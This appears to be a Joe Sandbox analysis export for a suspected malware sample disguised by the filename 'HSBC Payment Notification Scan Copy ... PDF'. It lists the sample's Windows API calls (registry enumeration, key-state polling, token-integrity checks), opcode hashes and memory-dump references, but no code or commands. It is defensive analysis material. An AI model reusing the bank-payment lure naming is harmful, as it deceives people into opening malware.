• API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
• String ID:
• API String ID: 146765662-0
APIs
• VariantInit.OLEAUT32(?), ref: 00478613
• CharUpperBuffW.USER32(?,?), ref: 00478722
• VariantClear.OLEAUT32(?), ref: 0047889A
  • Part of subcall function 00467562: VariantInit.OLEAUT32(00000000), ref: 004675A2
  • Part of subcall function 00467562: VariantCopy.OLEAUT32(00000000,?), ref: 004675AB
  • Part of subcall function 00467562: VariantClear.OLEAUT32(00000000), ref: 004675B7
Strings
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: Variant$ClearInit$BuffCharCopyUpper
• String ID: AUTOIT.ERROR$Incorrect Parameter format
• API String ID: 4237274167-1221869570
APIs
  • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
• _memset.LIBCMT ref: 00462B87
• GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00462BB6
• SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00462C69
• SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00462C97
Strings
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ItemMenu$Info$Default_memset_wcscpy
• String ID: 0
• API String ID: 4152858687-4108050209
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: _memmove$_free
• String ID: 3cA$_A
• API String ID: 2620147621-3480954128
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: _memset$_memmove
• String ID: 3cA$ERCP
• API String ID: 2532777613-1471582817
APIs
• _memset.LIBCMT ref: 004627C0
• GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 004627DC
• DeleteMenu.USER32(?,00000007,00000000), ref: 00462822
• DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,004C5890,00000000), ref: 0046286B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Menu$Delete$InfoItem_memset
• String ID: 0
• API String ID: 1173514356-4108050209
APIs
  • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
  • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
• SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00458F14
• SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00458F27
• SendMessageW.USER32(?,00000189,?,00000000), ref: 00458F57
  • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
Strings
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: MessageSend$_memmove$ClassName
• String ID: ComboBox$ListBox
• API String ID: 365058703-1403004172
APIs
  • Part of subcall function 00401D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00401D73
  • Part of subcall function 00401D35: GetStockObject.GDI32(00000011), ref: 00401D87
  • Part of subcall function 00401D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00401D91
• SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00486461
• LoadLibraryW.KERNEL32(?), ref: 00486468
• SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0048647D
• DestroyWindow.USER32(?), ref: 00486485
Strings
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                                                    • String ID: SysAnimate32
                                                                                                                                                    • API String ID: 4146253029-1011021900
                                                                                                                                                    • Opcode ID: b969d8637368705cbd5fc3c3416812969f869cc3827cfeeeab454fcba1ebf117
                                                                                                                                                    • Instruction ID: 96a79e02294e314170444e54cb88eb83d8519b29eeb49143b64c907e724dd28e
                                                                                                                                                    • Opcode Fuzzy Hash: b969d8637368705cbd5fc3c3416812969f869cc3827cfeeeab454fcba1ebf117
                                                                                                                                                    • Instruction Fuzzy Hash: 2C219571110205BFEF506F64DC40EBF37ADEF54724F114A2AF91492190D739DC41A768
APIs
• GetStdHandle.KERNEL32(0000000C), ref: 00466DBC
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00466DEF
• GetStdHandle.KERNEL32(0000000C), ref: 00466E01
• CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00466E3B
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: CreateHandle$FilePipe
• String ID: nul
• API String ID: 4209266947-2873401336
• Opcode ID: f98635b68cd5b0ab1880de70f3850fd061f65506a9295ae7d453fc561602cffb
• Instruction ID: cca2de9678abd998f0cd8c5114a45f7ff5fc269ace22cdb61a343b4aec1dc2fa
• Opcode Fuzzy Hash: f98635b68cd5b0ab1880de70f3850fd061f65506a9295ae7d453fc561602cffb
• Instruction Fuzzy Hash: 8B219274600209ABDB209F29DC05A9A77F8EF44720F214A2FFCA0D73D0EB759955CB5A
APIs
• GetStdHandle.KERNEL32(000000F6), ref: 00466E89
• CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00466EBB
• GetStdHandle.KERNEL32(000000F6), ref: 00466ECC
• CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00466F06
Similarity
• API ID: CreateHandle$FilePipe
• String ID: nul
• API String ID: 4209266947-2873401336
• Opcode ID: f710eb54d58d972596414a75e1bad7db44e4d7afab8e48cef3b5ff9c2d25cc6d
• Instruction ID: 3a9fffd2e99ff55030e4788a991c608e9c08d8bb738c80722c17144d2858802a
• Opcode Fuzzy Hash: f710eb54d58d972596414a75e1bad7db44e4d7afab8e48cef3b5ff9c2d25cc6d
• Instruction Fuzzy Hash: 7B21C7795003059BDB209F69CC04A9B77A8EF44724F210B1EFCA0D33D0E7759851C75A
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0046AC54
• GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0046ACA8
• __swprintf.LIBCMT ref: 0046ACC1
• SetErrorMode.KERNEL32(00000000,00000001,00000000,0048F910), ref: 0046ACFF
Similarity
• API ID: ErrorMode$InformationVolume__swprintf
• String ID: %lu
• API String ID: 3164766367-685833217
• Opcode ID: 1226eaab5c3aec93efd893ba7ce645b68cb4b14e47f6f225cd052cc4731cbfea
• Instruction ID: 026ba00fef41ead7d753cb67677e2cef5533d5e87c35db631ff5a0b10e4673a5
• Opcode Fuzzy Hash: 1226eaab5c3aec93efd893ba7ce645b68cb4b14e47f6f225cd052cc4731cbfea
• Instruction Fuzzy Hash: FE217470600109AFCB10EF65C945DAE77B8EF49318B10447EF905AB252DA35EE55CB25
APIs
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 0046115F
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 00461184
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 0046118E
• Sleep.KERNEL32(?,?,?,?,?,?,?,0045FCED,?,00460D40,?,00008000), ref: 004611C1
Similarity
• API ID: CounterPerformanceQuerySleep
• String ID: @F
• API String ID: 2875609808-2781531706
• Opcode ID: fb156e6c77600c7f304348c8d1eac85c626a95be7b30d4d71b6c442a0f0d2560
• Instruction ID: bb6757969e877831e55d7075b4886ee1e071d58b2ed1133263d880316bc49dff
• Opcode Fuzzy Hash: fb156e6c77600c7f304348c8d1eac85c626a95be7b30d4d71b6c442a0f0d2560
• Instruction Fuzzy Hash: B5113071D0051DD7CF00DFA5D9486EEBB78FF0E711F04446ADA41B2250DB789954CB9A
APIs
• OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047EC07
• GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047EC37
• GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0047ED6A
• CloseHandle.KERNEL32(?), ref: 0047EDEB
Similarity
• API ID: Process$CloseCountersHandleInfoMemoryOpen
• String ID:
• API String ID: 2364364464-0
• Opcode ID: 0682de77952afe081ab9211739b9fa55dc0894d1ffd7185653a5878fd6647099
• Instruction ID: fffec5fe55f17e3d6af6322d033c5a61601868e7b6c72126a0bd4eac84abd099
• Opcode Fuzzy Hash: 0682de77952afe081ab9211739b9fa55dc0894d1ffd7185653a5878fd6647099
• Instruction Fuzzy Hash: F38191B16007009FD720EF29C846F6AB7E5AF48714F04C96EF999AB3D2D674AC44CB49
APIs
  • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
  • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004800FD
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0048013C
• RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00480183
• RegCloseKey.ADVAPI32(?,?), ref: 004801AF
• RegCloseKey.ADVAPI32(00000000), ref: 004801BC
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3440857362-0
                                                                                                                                                    • Opcode ID: 3bdeb89f84ddb2d76b562790cbf358911bbf2c76af4dc57bd1f5005be4229c28
                                                                                                                                                    • Instruction ID: 88ea7daa6ea56d794f8f44f15d5cebce8ee28ea1eb3ac59e56a3faba9080710b
                                                                                                                                                    • Opcode Fuzzy Hash: 3bdeb89f84ddb2d76b562790cbf358911bbf2c76af4dc57bd1f5005be4229c28
                                                                                                                                                    • Instruction Fuzzy Hash: 00517E71214204AFC704EF54C885E6FB7E8FF84318F40492EF595972A2DB39E909CB56
                                                                                                                                                    APIs
                                                                                                                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0046E61F
                                                                                                                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0046E648
                                                                                                                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0046E687
                                                                                                                                                      • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                                                                                      • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0046E6AC
                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0046E6B4
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1389676194-0
                                                                                                                                                    • Opcode ID: 0e7ac17a3333e4cacf626b0afedb81deac31485ce1361bd2fc21f0fc68965d4a
                                                                                                                                                    • Instruction ID: 91bc9b0f2d422c2787d2346e32f4aa496c052f5f6ad9ddd010e4038a96899c27
                                                                                                                                                    • Opcode Fuzzy Hash: 0e7ac17a3333e4cacf626b0afedb81deac31485ce1361bd2fc21f0fc68965d4a
                                                                                                                                                    • Instruction Fuzzy Hash: 21514D75A00105DFCB01EF65C981AAEBBF5EF09314F1480AAE809AB3A2DB35ED11CF55
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 22afa8660c4250821daf86cd4b3c3329a23997c60e7bd91151dab5187926c109
                                                                                                                                                    • Instruction ID: 1d009f8157befd3e54c409f5ed609bf9f47d87f5e0fd5ad8ffda0b3aa488663e
                                                                                                                                                    • Opcode Fuzzy Hash: 22afa8660c4250821daf86cd4b3c3329a23997c60e7bd91151dab5187926c109
                                                                                                                                                    • Instruction Fuzzy Hash: A1419435904114ABE710FF24CC4CFAEBBA4EB09310F144A67E815A73E1C7B8AD65D75A
                                                                                                                                                    APIs
                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00402357
                                                                                                                                                    • ScreenToClient.USER32(004C57B0,?), ref: 00402374
                                                                                                                                                    • GetAsyncKeyState.USER32(00000001), ref: 00402399
                                                                                                                                                    • GetAsyncKeyState.USER32(00000002), ref: 004023A7
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4210589936-0
                                                                                                                                                    • Opcode ID: 68046f809d22b14954676cdf12726acdb6c494720a6fd25c838d2cb9e82985d9
                                                                                                                                                    • Instruction ID: 839f7de4dd1eaa7d0d5dffd0863558e2d4fc2f6d206a63eef28a724dc464cb27
                                                                                                                                                    • Opcode Fuzzy Hash: 68046f809d22b14954676cdf12726acdb6c494720a6fd25c838d2cb9e82985d9
                                                                                                                                                    • Instruction Fuzzy Hash: EB416135504115FBCF199FA9C848AEEBB74FB09364F20432BE825A22D0C7789D54DB95
                                                                                                                                                    APIs
                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004563E7
                                                                                                                                                    • TranslateAcceleratorW.USER32(?,?,?), ref: 00456433
                                                                                                                                                    • TranslateMessage.USER32(?), ref: 0045645C
                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 00456466
                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00456475
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2108273632-0
                                                                                                                                                    • Opcode ID: a7c8caa960d18c36081a52289de371ede53fdfa9d0291adbc1963a0764221605
                                                                                                                                                    • Instruction ID: 5e30e11b4a1e50e6093782a7c3f18569847dc725279de51faeef3c0bd44cbf51
                                                                                                                                                    • Opcode Fuzzy Hash: a7c8caa960d18c36081a52289de371ede53fdfa9d0291adbc1963a0764221605
                                                                                                                                                    • Instruction Fuzzy Hash: 0A31A731500646AFDB648F74CC44FAB7BA8AB02306F95017AEC11C3262E729A4CDDB5D
                                                                                                                                                    APIs
                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00458A30
                                                                                                                                                    • PostMessageW.USER32(?,00000201,00000001), ref: 00458ADA
                                                                                                                                                    • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00458AE2
                                                                                                                                                    • PostMessageW.USER32(?,00000202,00000000), ref: 00458AF0
                                                                                                                                                    • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00458AF8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessagePostSleep$RectWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3382505437-0
                                                                                                                                                    • Opcode ID: 0ca9fd056ca19cb6c90bb9abdc103f32fbac461099b2f563c45de53987908b56
                                                                                                                                                    • Instruction ID: 80642b6b9bd3aba6b5d9fb31be4e412888bcfd4668c130c4b2f9d35bc39c9ded
                                                                                                                                                    • Opcode Fuzzy Hash: 0ca9fd056ca19cb6c90bb9abdc103f32fbac461099b2f563c45de53987908b56
                                                                                                                                                    • Instruction Fuzzy Hash: 9831DF71500219EBDF14CFA8D94CA9E3BB5EB04316F10862EF924E72D2CBB49D18CB94
                                                                                                                                                    APIs
                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 0045B204
                                                                                                                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0045B221
                                                                                                                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0045B259
                                                                                                                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0045B27F
                                                                                                                                                    • _wcsstr.LIBCMT ref: 0045B289
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
• String ID:
• API String ID: 3902887630-0
APIs
  • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
• GetWindowLongW.USER32(?,000000F0), ref: 0048B192
• SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0048B1B7
• SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0048B1CF
• GetSystemMetrics.USER32(00000004), ref: 0048B1F8
• SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00470E90,00000000), ref: 0048B216
Similarity
• API ID: Window$Long$MetricsSystem
• String ID:
• API String ID: 2294984445-0
APIs
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00459320
  • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00459352
• __itow.LIBCMT ref: 0045936A
• SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00459392
• __itow.LIBCMT ref: 004593A3
Similarity
• API ID: MessageSend$__itow$_memmove
• String ID:
• API String ID: 2983881199-0
APIs
• ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0040134D
• SelectObject.GDI32(?,00000000), ref: 0040135C
• BeginPath.GDI32(?), ref: 00401373
• SelectObject.GDI32(?,00000000), ref: 0040139C
Similarity
• API ID: ObjectSelect$BeginCreatePath
• String ID:
• API String ID: 3225163088-0
APIs
• GetCurrentThreadId.KERNEL32 ref: 00464ABA
• __beginthreadex.LIBCMT ref: 00464AD8
• MessageBoxW.USER32(?,?,?,?), ref: 00464AED
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00464B03
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00464B0A
Similarity
• API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
• String ID:
• API String ID: 3824534824-0
APIs
• GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0045821E
• GetLastError.KERNEL32(?,00457CE2,?,?,?), ref: 00458228
• GetProcessHeap.KERNEL32(00000008,?,?,00457CE2,?,?,?), ref: 00458237
• HeapAlloc.KERNEL32(00000000,?,00457CE2,?,?,?), ref: 0045823E
• GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00458255
Similarity
• API ID: HeapObjectSecurityUser$AllocErrorLastProcess
• String ID:
• API String ID: 842720411-0
APIs
• CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?,?,00457455), ref: 00457127
• ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457142
• lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457150
• CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?), ref: 00457160
• CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 0045716C
Memory Dump Source
• Source File: 00000000.00000002.1346068077.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1346050215.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.000000000048F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346129159.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346185113.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346205957.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346239799.00000000004E9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1346336697.00000000004F0000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
Similarity
• API ID: From$Prog$FreeStringTasklstrcmpi
• String ID:
• API String ID: 3897988419-0
APIs
• QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00465260
• QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0046526E
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00465276
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00465280
• Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004652BC
Similarity
• API ID: PerformanceQuery$CounterSleep$Frequency
• String ID:
• API String ID: 2833360925-0
APIs
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00458121
• GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0045812B
• GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0045813A
• HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00458141
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00458157
Similarity
